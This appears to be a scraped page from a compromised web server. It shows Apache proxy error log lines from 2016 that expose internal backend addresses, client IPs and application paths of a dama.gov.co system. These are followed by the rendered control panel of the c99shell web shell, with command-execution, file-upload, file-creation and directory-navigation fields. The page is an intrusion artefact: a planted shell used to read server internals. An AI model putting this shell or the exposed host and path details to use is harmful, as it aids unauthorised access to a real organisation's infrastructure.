[Mon Jul 18 17:55:03.738660 2016] [proxy_http:error] [pid 6440:tid 15496] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:16531] AH01102: error reading status line from remote server 172.22.1.31:80
[Mon Jul 18 17:55:03.738660 2016] [proxy:error] [pid 6440:tid 15496] [client 201.245.192.253:16531] AH00898: Error reading from remote server returned by /isolucionsda/Logout.aspx
[Mon Jul 18 18:00:24.225623 2016] [ssl:error] [pid 6440:tid 15764] AH02032: Hostname 190.27.245.106 provided via SNI and hostname dama.gov.co provided via HTTP are different
[Mon Jul 18 18:41:00.404902 2016] [proxy_http:error] [pid 6440:tid 16164] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:10071] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=4
[Mon Jul 18 18:41:00.404902 2016] [proxy:error] [pid 6440:tid 16164] [client 201.245.192.253:10071] AH00898: Error reading from remote server returned by /isolucionsda/BarraFavoritos.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=4
[Mon Jul 18 19:26:23.328284 2016] [proxy:error] [pid 6440:tid 16096] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 172.22.1.51:8399 (172.22.1.51) failed
[Mon Jul 18 19:26:23.328284 2016] [proxy:error] [pid 6440:tid 16096] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.51) for 60s
[Mon Jul 18 19:26:23.328284 2016] [proxy_http:error] [pid 6440:tid 16096] [client 152.61.128.50:55892] AH01114: HTTP: failed to make connection to backend: 172.22.1.51
[Mon Jul 18 19:26:23.562285 2016] [proxy:error] [pid 6440:tid 14604] AH00940: HTTP: disabled connection for (172.22.1.51)
[Mon Jul 18 20:35:09.817332 2016] [mpm_winnt:warn] [pid 6440:tid 17816] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Jul 18 20:57:27.816082 2016] [proxy:error] [pid 6440:tid 15052] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 172.22.1.51:8399 (172.22.1.51) failed
[Mon Jul 18 20:57:27.816082 2016] [proxy:error] [pid 6440:tid 15052] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.51) for 60s
[Mon Jul 18 20:57:27.816082 2016] [proxy_http:error] [pid 6440:tid 15052] [client 152.61.128.50:45012] AH01114: HTTP: failed to make connection to backend: 172.22.1.51
[Mon Jul 18 20:57:28.065683 2016] [proxy:error] [pid 6440:tid 15052] AH00940: HTTP: disabled connection for (172.22.1.51)
[Mon Jul 18 20:57:28.330883 2016] [proxy:error] [pid 6440:tid 15052] AH00940: HTTP: disabled connection for (172.22.1.51)

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0468 ]--